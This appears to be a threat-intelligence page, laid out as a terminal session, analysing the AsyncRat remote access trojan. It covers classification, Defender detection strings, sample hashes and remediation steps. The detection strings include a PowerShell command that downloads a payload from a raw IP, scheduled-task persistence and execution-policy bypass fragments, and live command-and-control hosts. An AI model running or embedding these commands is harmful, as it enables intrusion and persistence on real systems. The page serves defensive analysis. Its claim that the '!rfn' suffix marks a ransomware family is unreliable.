user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:Win64/AsyncRat!rfn
Trojan:Win64/AsyncRat!rfn - Windows Defender threat signature analysis

Trojan:Win64/AsyncRat!rfn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win64/AsyncRat!rfn
Classification:
Type:Trojan
Platform:Win64
Family:AsyncRat
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Specific ransomware family name
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 64-bit Windows platform, family AsyncRat

Summary:

Trojan:Win64/AsyncRat!rfn is a sophisticated Remote Access Trojan (RAT) that uses various techniques like script-based execution, abusing legitimate processes (MSBuild.exe), and establishing persistence to gain remote control over the compromised system. It is designed to exfiltrate sensitive data, communicate with command and control servers (e.g., `serverupdates48.ga`), and encrypt its communications, posing a significant threat to data confidentiality and system integrity.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 94e6cf4122215224008285277ee1f4df61a7739c8c85ed569f112d70ce8b998f
94e6cf4122215224008285277ee1f4df61a7739c8c85ed569f112d70ce8b998f
13/12/2025
VirusTotalDownload Sample
Filename: 32746cb823dcd1f3e79a5fb4843bbdf5a65a8f023649e.exe
32746cb823dcd1f3e79a5fb4843bbdf5a65a8f023649e46137420b399151febf
08/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected system from the network. Perform a full system scan with updated Windows Defender and ensure all detected malicious files are removed. Manually inspect and remove any persistence mechanisms (e.g., `Run` registry keys, scheduled tasks). Block associated command and control domains like `serverupdates48.ga` at the network perimeter. Change all user and administrative credentials that may have been compromised.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 08/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$